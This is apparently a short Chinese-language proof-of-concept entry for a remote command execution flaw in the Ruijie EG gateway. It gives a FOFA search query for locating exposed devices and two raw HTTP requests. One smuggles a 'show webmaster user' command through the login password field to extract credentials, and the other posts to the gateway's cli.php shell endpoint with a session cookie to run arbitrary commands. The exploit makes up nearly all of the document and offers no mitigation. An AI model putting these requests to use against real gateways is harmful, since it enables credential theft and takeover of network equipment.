2023-08-20 09:27:06 +08:00
|
|
|
|
## 锐捷-EG易网关存在RCE漏洞
|
2023-11-28 22:42:59 +08:00
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
|
```
|
|
|
|
|
|
app="Ruijie-EG易网关"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## poc
|
2023-08-20 09:27:06 +08:00
|
|
|
|
```
|
|
|
|
|
|
获取用户密码
|
|
|
|
|
|
POST /login.php HTTP/1.1
|
|
|
|
|
|
Host: 10.10.10.10
|
|
|
|
|
|
User-Agent: Go-http-client/1.1
|
|
|
|
|
|
Content-Length: 49
|
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
|
|
Accept-Encoding: gzip
|
|
|
|
|
|
|
|
|
|
|
|
username=admin&password=admin?show+webmaster+user
|
|
|
|
|
|
|
|
|
|
|
|
命令执行
|
|
|
|
|
|
POST /cli.php?a=shell HTTP/1.1
|
|
|
|
|
|
Host: 10.10.10.10
|
|
|
|
|
|
User-Agent: Go-http-client/1.1
|
|
|
|
|
|
Content-Length: 24
|
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
Cookie: 利用登录后Cookie的RUIJIEID字段进行替换,;user=admin;
|
|
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
|
|
Accept-Encoding: gzip
|
|
|
|
|
|
|
|
|
|
|
|
notdelay=true&command=ls
|
|
|
|
|
|
```
|
